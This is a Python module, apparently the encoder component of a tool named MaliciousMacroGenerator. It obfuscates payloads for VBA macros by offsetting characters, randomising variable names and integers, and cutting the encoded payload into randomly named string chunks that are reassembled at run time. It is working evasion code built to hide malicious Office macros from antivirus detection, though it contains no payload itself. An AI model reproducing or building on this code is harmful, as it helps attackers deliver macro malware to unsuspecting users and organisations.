MaliciousMacroGenerator/lib/encoder.py

106 lines
3.9 KiB
Python
Raw Normal View History

2016-11-11 18:54:14 +00:00
import random
import string
import re
class Encoder:
def __init__(self, helper):
self.helper = helper
self.default = ["var", "func", "data", "bool"]
self.default_size = len(self.default)
try:
self.offset = int(helper.GetConfig("encodingoffset"))
except:
helper.ExitShowError("\"%s\" is not a valid encodingoffset value." % self.offset)
def get_encoding_offset(self):
return self.offset
def append_vars(self, vars):
self.default += vars
return self
def encode_buffer(self, buffer):
output = ""
for c in buffer:
output += chr(ord(c) + int(self.offset))
return output
def encode_user_vars(self, buffer):
for var in re.findall("{\[.*?\]}", buffer):
buffer = buffer.replace(var, self.encode_buffer(self.remove_encode_tag(var)))
return buffer
def append_def_use_tag(self, buffer):
for var in re.findall("\[use:.*?\]", buffer):
buffer = buffer.replace(var, "")
self.default.append(self.remove_def_use_tag(var))
return buffer
def remove_encode_tag(self, buffer):
return buffer.replace("{[", "").replace("]}", "")
def remove_def_use_tag(self, buffer):
return buffer.replace("[use:", "").replace("]", "")
def rand_vars(self, buffer):
iterator = self.helper.GetConfig("varcount")
count = 0
for var in self.default:
count += 1
for i in reversed(range(1, iterator)):
buffer = buffer.replace(var + str(i), self.gen_str(random.randrange(5, 25)))
if count > self.default_size:
buffer = buffer.replace(var, self.gen_str(random.randrange(5, 25)))
return buffer
def rand_smallint(self, buffer):
return self.__rand_int(buffer, "smallint", 1, 2)
def rand_int(self, buffer):
return self.__rand_int(buffer, "int", 2, 5)
def __rand_int(self, buffer, var, min, max):
iterator = self.helper.GetConfig("varcount")
for i in reversed(range(1, iterator)):
buffer = buffer.replace("[" + var + str(i) + "]", self.gen_int(random.randrange(min, max)))
return buffer
def gen_str(self, size):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
def gen_int(self, size):
return ''.join(random.SystemRandom().choice(string.digits) for _ in range(size))
def replace_var(self, buffer, var, data, encode=False):
if encode:
data = self.encode_buffer(data)
return buffer.replace("[" + var + "]", str(data))
def chunk_payload(self, buffer, payload):
payload = self.encode_buffer(payload)
chunksize = int(self.helper.GetConfig("chunksize"))
vars = "Dim " + self.gen_str(random.randrange(5, 20)) + " As String\r\n"
args = ""
size = 0
for chunk in re.findall("." * chunksize, payload):
current_var = self.gen_str(random.randrange(5, 20))
vars += "\tDim " + current_var + " As String\r\n"
vars += "\t" + current_var + " = \"" + chunk + "\"\r\n"
args += current_var + " & "
size += chunksize
if len(payload) > size:
current_var = self.gen_str(random.randrange(5, 20))
vars += "\tDim " + current_var + " As String\r\n"
vars += "\t" + current_var + " = \"" + payload[(len(payload) - size) * -1:] + "\"\r\n"
args += current_var
else:
args = args[:-3]
return buffer.replace("[payload]", vars).replace("[payload_args]", args)